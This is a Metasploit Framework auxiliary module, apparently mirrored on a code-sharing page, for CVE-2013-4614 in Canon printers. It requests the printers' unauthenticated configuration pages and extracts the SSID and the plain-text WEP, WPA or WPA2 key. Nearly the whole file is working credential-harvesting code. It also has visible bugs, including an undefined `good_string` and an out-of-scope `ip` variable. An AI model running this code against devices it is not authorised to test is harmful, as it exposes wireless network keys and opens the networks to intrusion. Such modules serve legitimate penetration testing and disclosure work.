Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'nokogiri'

7


8
class MetasploitModule < Msf::Auxiliary

9
  include Msf::Auxiliary::Report

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::Scanner

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Canon Printer Wireless Configuration Disclosure',

18
        'Description' => %q{

19
          This module enumerates wireless credentials from Canon printers with a web interface.

20
          It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,

21
          MX890, MX920.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'

26
        ],

27
        'References' => [

28
          [ 'CVE', '2013-4614' ],

29
          [ 'OSVDB', '94417' ],

30
          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']

31
        ],

32
        'DisclosureDate' => '2013-06-18',

33
        'Notes' => {

34
          'Reliability' => UNKNOWN_RELIABILITY,

35
          'Stability' => UNKNOWN_STABILITY,

36
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

37
        }

38
      )

39
    )

40
  end

41


42
  def get_network_settings

43
    begin

44
      res = send_request_cgi({

45
        'method' => 'GET',

46
        'uri' => '/English/pages_MacUS/lan_set_content.html',

47
      })

48
    rescue

49
      print_error("#{rhost}:#{rport} Could not connect.")

50
      return

51
    end

52


53
    if res

54
      if res.code == 200

55


56
        html = Nokogiri::HTML(res.body)

57


58
        checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'

59


60
        if checked_lan_setting.count == 1

61
          lan_setting = ''

62
          ssid = ''

63
          case checked_lan_setting[0]['value']

64
          when '0'

65
            lan_setting = 'Do not use LAN'

66
          when '1'

67
            lan_setting = 'Use wired LAN'

68
          when '2'

69
            lan_setting = 'Use wireless LAN'

70


71
            ssid_input = html.xpath '//input[@name="LAN_TXT1"]'

72
            ssid = ssid_input[0]['value'] if ssid_input.count == 1

73
          end

74


75
          return lan_setting, ssid

76
        else

77
          print_error("#{rhost}:#{rport} Could not determine LAN Settings.")

78
        end

79


80
      elsif res.code == 401

81
        print_error("#{rhost}:#{rport} Authentication failed")

82
      elsif res.code == 404

83
        print_error("#{rhost}:#{rport} File not found")

84
      end

85
    end

86
  end

87


88
  def get_wireless_key

89
    begin

90
      res = send_request_cgi({

91
        'method' => 'GET',

92
        'uri' => "/English/pages_MacUS/wls_set_content.html",

93
      })

94
    rescue

95
      print_error("#{ip}:#{rport} Could not connect.")

96
      return

97
    end

98


99
    if res

100
      if res.code == 200

101
        html = Nokogiri::HTML(res.body)

102
        encryption_setting = ''

103
        encryption_key = ''

104


105
        checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'

106
        case checked_encryption_setting[0]['value']

107
        when '0'

108
          encryption_setting = 'None'

109
        when '1'

110
          encryption_setting = 'WEP'

111
          wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'

112
          encryption_key = wep_key_inputs.collect { |x| x['value'] }.join(', ')

113
        when '2'

114
          encryption_setting = 'WPA'

115
          wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'

116
          encryption_key = wpa_key_input[0]['value']

117
        when '3'

118
          encryption_setting = 'WPA2'

119
          wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'

120
          encryption_key = wpa2_key_input[0]['value']

121
        end

122


123
        return encryption_setting, encryption_key

124


125
      elsif res.code == 401

126
        print_error("#{rhost}:#{rport} Authentication failed")

127
      elsif res.code == 404

128
        print_error("#{rhost}:#{rport} File not found")

129
      end

130
    end

131
  end

132


133
  def run_host(ip)

134
    ns = get_network_settings

135
    return if ns.nil?

136


137
    data = {

138
      :rhost => rhost,

139
      :rport => rport,

140
      :option => ns[0]

141
    }

142
    if ns[0] == 'Use wireless LAN'

143
      wireless_key = get_wireless_key

144
      data.merge!(

145
        {

146
          :ssid => ns[1],

147
          :encryption_type => wireless_key[0],

148
          :key => wireless_key[1]

149
        }

150
      )

151
    end

152


153
    report_note({

154
      :data => data,

155
      :type => 'canon.wireless',

156
      :host => ip,

157
      :port => rport

158
    })

159


160
    print_good good_string

161
  end

162
end

163


164